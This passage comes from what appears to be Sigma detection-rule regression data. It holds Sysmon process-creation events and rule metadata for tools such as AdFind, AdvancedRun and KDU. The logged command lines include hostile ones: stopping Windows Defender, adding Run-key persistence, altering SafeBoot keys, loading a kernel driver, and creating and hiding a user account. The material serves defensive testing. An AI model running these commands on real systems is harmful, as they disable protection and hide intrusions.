"Hashes": "MD5=B0C4A9C1D8C4641A161B3DBF111454DF,SHA256=484DD00E85C033FBFD506B956AC0ACD29B30F239755ED753A2788A842425B384,IMPHASH=680DAD9E300346E05A85023965867201",
"ParentProcessGuid": "14207D89-1136-68FA-2D13-000000003F02",
"ParentProcessId": 1648,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "MIDGARDNET\\SwachchhandaP"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/info.yml
================================================
id: 5a7dd11d-3b65-49b3-ac81-a9f855742bbc
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 9a132afa-654e-11eb-ae93-0242ac130002
title: PUA - AdFind Suspicious Execution
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-23T10:01:48.031627Z"
}
},
"EventRecordID": 650317,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3076,
"ThreadID": 4936
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "srv-01.midgardnet.tech",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-23 10:01:48.012",
"ProcessGuid": "14207D89-FD0C-68F9-D610-000000003F02",
"ProcessId": 2064,
"Image": "C:\\Program Files (x86)\\Advanced IP Scanner\\advanced_ip_scanner.exe",
"FileVersion": "2.5.4594.1",
"Description": "Advanced IP Scanner",
"Product": "Advanced IP Scanner",
"Company": "Famatech Corp.",
"OriginalFileName": "advanced_ip_scanner.exe",
"CommandLine": "\"C:\\Program Files (x86)\\Advanced IP Scanner\\advanced_ip_scanner.exe\"",
"CurrentDirectory": "C:\\Program Files (x86)\\Advanced IP Scanner\\",
"User": "MIDGARDNET\\SwachchhandaP",
"LogonGuid": "14207D89-91E6-68F9-0F94-460000000000",
"LogonId": "0x46940f",
"TerminalSessionId": 2,
"IntegrityLevel": "Medium",
"Hashes": "MD5=B3411927CC7CD05E02BA64B2A789BBDE,SHA256=4B036CC9930BB42454172F888B8FDE1087797FC0C9D31AB546748BD2496BD3E5,IMPHASH=B7378C9136E7511821BFD495ADBE3CB0",
"ParentProcessGuid": "14207D89-FCFD-68F9-D010-000000003F02",
"ParentProcessId": 3240,
"ParentImage": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-F5HMR.tmp\\Advanced_IP_Scanner_2.5.4594.1.tmp",
"ParentCommandLine": "\"C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-F5HMR.tmp\\Advanced_IP_Scanner_2.5.4594.1.tmp\" /SL5=\"$E0218,20439558,139776,C:\\Users\\SwachchhandaP\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe\"",
"ParentUser": "MIDGARDNET\\SwachchhandaP"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/info.yml
================================================
id: 6629d68a-c1b8-4eb8-bfa6-7dbd5018d922
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: bef37fa2-f205-4a7b-b484-0759bfd5f86f
title: PUA - Advanced IP Scanner Execution
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/bef37fa2-f205-4a7b-b484-0759bfd5f86f.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-23T10:11:05.435406Z"
}
},
"EventRecordID": 650602,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3076,
"ThreadID": 4936
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "srv-01.midgardnet.tech",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-23 10:11:05.414",
"ProcessGuid": "14207D89-FF39-68F9-1A11-000000003F02",
"ProcessId": 7316,
"Image": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\Advanced Port Scanner 2\\advanced_port_scanner.exe",
"FileVersion": "-",
"Description": "Advanced Port Scanner",
"Product": "Advanced Port Scanner",
"Company": "Famatech Corp.",
"OriginalFileName": "advanced_port_scanner.exe",
"CommandLine": "\"C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\Advanced Port Scanner 2\\advanced_port_scanner.exe\" /portable \"C:/Users/SwachchhandaP/Downloads/\" /lng en_us",
"CurrentDirectory": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\Advanced Port Scanner 2\\",
"User": "MIDGARDNET\\SwachchhandaP",
"LogonGuid": "14207D89-91E6-68F9-0F94-460000000000",
"LogonId": "0x46940f",
"TerminalSessionId": 2,
"IntegrityLevel": "Medium",
"Hashes": "MD5=4FDABE571B66CEEC3448939BFB3FFCD1,SHA256=8B9C7D2554FE315199FAE656448DC193ACCBEC162D4AFFF3F204CE2346507A8A,IMPHASH=31E3E9D3DDE3C0C0F2C167B89B8E269C",
"ParentProcessGuid": "14207D89-FF2E-68F9-1911-000000003F02",
"ParentProcessId": 3972,
"ParentImage": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-90PLO.tmp\\Advanced_Port_Scanner_2.5.3869.tmp",
"ParentCommandLine": "\"C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\2\\is-90PLO.tmp\\Advanced_Port_Scanner_2.5.3869.tmp\" /SL5=\"$E0634,19769177,139776,C:\\Users\\SwachchhandaP\\Downloads\\Advanced_Port_Scanner_2.5.3869.exe\"",
"ParentUser": "MIDGARDNET\\SwachchhandaP"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/info.yml
================================================
id: 998b5845-1623-4b2f-b9d1-bfc402172d45
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 54773c5f-f1cc-4703-9126-2f797d96a69d
title: PUA - Advanced Port Scanner Execution
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/54773c5f-f1cc-4703-9126-2f797d96a69d.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-23T10:24:32.948699Z"
}
},
"EventRecordID": 650887,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3076,
"ThreadID": 4936
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "srv-01.midgardnet.tech",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-23 10:24:32.936",
"ProcessGuid": "14207D89-0260-68FA-9511-000000003F02",
"ProcessId": 4220,
"Image": "C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\AdvancedRun.exe",
"FileVersion": "1.51",
"Description": "Run a program with different settings that you choose.",
"Product": "AdvancedRun",
"Company": "NirSoft",
"OriginalFileName": "AdvancedRun.exe",
"CommandLine": "\"C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\AdvancedRun.exe\"",
"CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\",
"User": "MIDGARDNET\\SwachchhandaP",
"LogonGuid": "14207D89-91E6-68F9-0F94-460000000000",
"LogonId": "0x46940f",
"TerminalSessionId": 2,
"IntegrityLevel": "Medium",
"Hashes": "MD5=3F44DD7F287DA4A9A1BE82E5178B7DC8,SHA256=E8000766C215B2DF493C0AA0D8FA29FAE04B1D0730AD1E7D7626484DC9D7B225,IMPHASH=65F94FEE8F6FA846B2B29BDD0721C096",
"ParentProcessGuid": "14207D89-91E9-68F9-E104-000000003F02",
"ParentProcessId": 452,
"ParentImage": "C:\\Windows\\explorer.exe",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"ParentUser": "MIDGARDNET\\SwachchhandaP"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun/info.yml
================================================
id: 5f4db274-e3e6-45cd-a5a3-ef03f678dd28
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: d2b749ee-4225-417e-b20e-a8d2193cbb84
title: PUA - AdvancedRun Execution
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun/d2b749ee-4225-417e-b20e-a8d2193cbb84.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-23T10:19:13.088214Z"
}
},
"EventRecordID": 650834,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3076,
"ThreadID": 4936
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "srv-01.midgardnet.tech",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-23 10:19:13.085",
"ProcessGuid": "14207D89-0121-68FA-6E11-000000003F02",
"ProcessId": 6448,
"Image": "C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\AdvancedRun.exe",
"FileVersion": "1.51",
"Description": "Run a program with different settings that you choose.",
"Product": "AdvancedRun",
"Company": "NirSoft",
"OriginalFileName": "AdvancedRun.exe",
"CommandLine": "AdvancedRun.exe /EXEFilename \"C:\\Windows\\System32\\sc.exe\" /WindowState 0 /CommandLine \"stop WinDefend\" /StartDirectory \"\" /RunAs 8 /Run",
"CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\advancedrun-x64\\",
"User": "MIDGARDNET\\SwachchhandaP",
"LogonGuid": "14207D89-91E6-68F9-0F94-460000000000",
"LogonId": "0x46940f",
"TerminalSessionId": 2,
"IntegrityLevel": "Medium",
"Hashes": "MD5=3F44DD7F287DA4A9A1BE82E5178B7DC8,SHA256=E8000766C215B2DF493C0AA0D8FA29FAE04B1D0730AD1E7D7626484DC9D7B225,IMPHASH=65F94FEE8F6FA846B2B29BDD0721C096",
"ParentProcessGuid": "14207D89-00ED-68FA-6611-000000003F02",
"ParentProcessId": 700,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "MIDGARDNET\\SwachchhandaP"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/info.yml
================================================
id: 0f52b7ec-72e4-4362-acf5-b5558ff58323
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: fa00b701-44c6-4679-994d-5a18afa8a707
title: PUA - AdvancedRun Suspicious Execution
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/fa00b701-44c6-4679-994d-5a18afa8a707.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_kdu_driver_tool/e76ca062-4de0-4d79-8d90-160a0d335eca.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2026-01-23T04:01:30.178887Z"
}
},
"EventRecordID": 23388,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3208,
"ThreadID": 1724
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2026-01-23 04:01:30.177",
"ProcessGuid": "0197231E-F29A-6972-6716-000000000800",
"ProcessId": 12200,
"Image": "C:\\Users\\xodih\\Downloads\\kdu.exe",
"FileVersion": "1.1.1.2105",
"Description": "Kernel Driver Utility",
"Product": "KDU",
"Company": "UG North",
"OriginalFileName": "Hamakaze.exe",
"CommandLine": "\"C:\\Users\\xodih\\Downloads\\kdu.exe\" -prv 1 -map MyDriver.sys",
"CurrentDirectory": "C:\\Users\\xodih\\Downloads\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
"LogonId": "0x317fb",
"TerminalSessionId": 1,
"IntegrityLevel": "Medium",
"Hashes": "MD5=8ED32ACE2FBCE50296D3A1A16D963BA7,SHA256=5A08ECB2FAD5D5C701B4EC42BD0FAB7B7B4616673B2D8FBD76557203C5340A0F,IMPHASH=404E2902C47CF33EE0616252BFBCF67B",
"ParentProcessGuid": "0197231E-F25A-6972-5F16-000000000800",
"ParentProcessId": 13764,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_kdu_driver_tool/info.yml
================================================
id: 199a332f-7017-4afa-81a4-407fb5cc345d
description: N/A
date: 2026-01-23
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: e76ca062-4de0-4d79-8d90-160a0d335eca
title: PUA - Kernel Driver Utility (KDU) Execution
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_pua_kdu_driver_tool/e76ca062-4de0-4d79-8d90-160a0d335eca.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-22T20:35:26.043284Z"
}
},
"EventRecordID": 256890,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3168,
"ThreadID": 4580
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-1",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-22 20:35:26.041",
"ProcessGuid": "5AB40FD1-400E-68F9-6331-000000003B02",
"ProcessId": 6032,
"Image": "C:\\Windows\\System32\\reg.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Registry Console Tool",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "reg.exe",
"CommandLine": "REG ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"softoz\" /t REG_SZ /F /D \"C:\\Users\\admin\\AppData\\Roaming\\sihostt.exe\"",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\",
"User": "AR-WIN-1\\Administrator",
"LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000",
"LogonId": "0x104be4",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860",
"ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02",
"ParentProcessId": 8252,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "AR-WIN-1\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_reg_add_run_key/info.yml
================================================
id: e60e5322-dc51-4969-be3b-12caad8a9276
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: de587dce-915e-4218-aac4-835ca6af6f70
title: Potential Persistence Attempt Via Run Keys Using Reg.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_reg_add_run_key/de587dce-915e-4218-aac4-835ca6af6f70.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-22T20:38:06.571958Z"
}
},
"EventRecordID": 256915,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3168,
"ThreadID": 4580
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-1",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-22 20:38:06.570",
"ProcessGuid": "5AB40FD1-40AE-68F9-7631-000000003B02",
"ProcessId": 2456,
"Image": "C:\\Windows\\System32\\reg.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Registry Console Tool",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "reg.exe",
"CommandLine": "reg copy hklm\\system\\CurrentControlSet\\services\\acpi hklm\\system\\CurrentControlSet\\control\\safeboot\\network\\nas /s /f",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\",
"User": "AR-WIN-1\\Administrator",
"LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000",
"LogonId": "0x104be4",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860",
"ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02",
"ParentProcessId": 8252,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "AR-WIN-1\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_reg_add_safeboot/info.yml
================================================
id: 6f781d8b-1b6c-408b-a90d-08aceb2a14d0
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: d7662ff6-9e97-4596-a61d-9839e32dee8d
title: Add SafeBoot Keys Via Reg Utility
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_reg_add_safeboot/d7662ff6-9e97-4596-a61d-9839e32dee8d.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_reg_system_language_discovery/c43a5405-e8e1-4221-9ac9-dbe3fa14e886.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2026-01-19T16:11:39.281042Z"
}
},
"EventRecordID": 553,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 5928,
"ThreadID": 9720
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "DESKTOP-54JCEU5",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2026-01-19 16:11:39.278",
"ProcessGuid": "34E9093F-57BB-696E-7001-000000000300",
"ProcessId": 4392,
"Image": "C:\\Windows\\System32\\reg.exe",
"FileVersion": "10.0.19041.1 (WinBuild.160101.0800)",
"Description": "Registry Console Tool",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "reg.exe",
"CommandLine": "reg query HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language",
"CurrentDirectory": "C:\\Users\\marco\\",
"User": "DESKTOP-54JCEU5\\marco",
"LogonGuid": "34E9093F-54FA-696E-7C2B-070000000000",
"LogonId": "0x72b7c",
"TerminalSessionId": 1,
"IntegrityLevel": "Medium",
"Hashes": "MD5=227F63E1D9008B36BDBCC4B397780BE4,SHA256=C0E25B1F9B22DE445298C1E96DDFCEAD265CA030FA6626F61A4A4786CC4A3B7D,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC",
"ParentProcessGuid": "34E9093F-57AD-696E-6E01-000000000300",
"ParentProcessId": 12188,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "DESKTOP-54JCEU5\\marco"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_reg_system_language_discovery/info.yml
================================================
id: 70cc76fe-3470-48ad-b15f-5714ad17a5c6
description: N/A
date: 2026-01-19
author: Marco Pedrinazzi (@pedrinazziM) (InTheCyber)
rule_metadata:
- id: c43a5405-e8e1-4221-9ac9-dbe3fa14e886
title: System Language Discovery via Reg.Exe
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_reg_system_language_discovery/c43a5405-e8e1-4221-9ac9-dbe3fa14e886.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-31T05:06:45.367278Z"
}
},
"EventRecordID": 657153,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3080,
"ThreadID": 4948
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "srv-01.midgardnet.tech",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-31 05:06:45.364",
"ProcessGuid": "14207D89-43E5-6904-4506-000000004002",
"ProcessId": 5244,
"Image": "C:\\Windows\\System32\\reg.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Registry Console Tool",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "reg.exe",
"CommandLine": "REG ADD \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" /v AtomicOperator$ /t REG_DWORD /d 0",
"CurrentDirectory": "C:\\Users\\SWACHC~1\\AppData\\Local\\Temp\\",
"User": "MIDGARDNET\\SwachchhandaP",
"LogonGuid": "14207D89-34DD-6904-8287-190000000000",
"LogonId": "0x198782",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860",
"ParentProcessGuid": "14207D89-43E5-6904-4106-000000004002",
"ParentProcessId": 6656,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"cmd.exe\" /c NET USER AtomicOperator$ At0micRedTeam! /ADD /expires:never & REG ADD \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" /v AtomicOperator$ /t REG_DWORD /d 0",
"ParentUser": "MIDGARDNET\\SwachchhandaP"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/info.yml
================================================
id: de8dc72e-19eb-465a-83ac-59545ae56426
description: N/A
date: 2025-10-31
author: SigmaHQ Team
rule_metadata:
- id: 9ec9fb1b-e059-4489-9642-f270c207923d
title: Hiding User Account Via SpecialAccounts Registry Key - CommandLine
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_registry_special_accounts_hide_user/9ec9fb1b-e059-4489-9642-f270c207923d.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_renamed_adfind/df55196f-f105-44d3-a675-e9dfb6cc2f2b.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-22T20:26:58.441823Z"
}
},
"EventRecordID": 256793,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3168,
"ThreadID": 4580
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-1",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-22 20:26:58.421",
"ProcessGuid": "5AB40FD1-3E12-68F9-1A31-000000003B02",
"ProcessId": 6856,
"Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-AdFind.exe",
"FileVersion": "1.52.0.5064",
"Description": "-",
"Product": "AdFind",
"Company": "www.joeware.net",
"OriginalFileName": "AdFind.exe",
"CommandLine": "renamed-AdFind.exe",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\",
"User": "AR-WIN-1\\Administrator",
"LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000",
"LogonId": "0x104be4",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
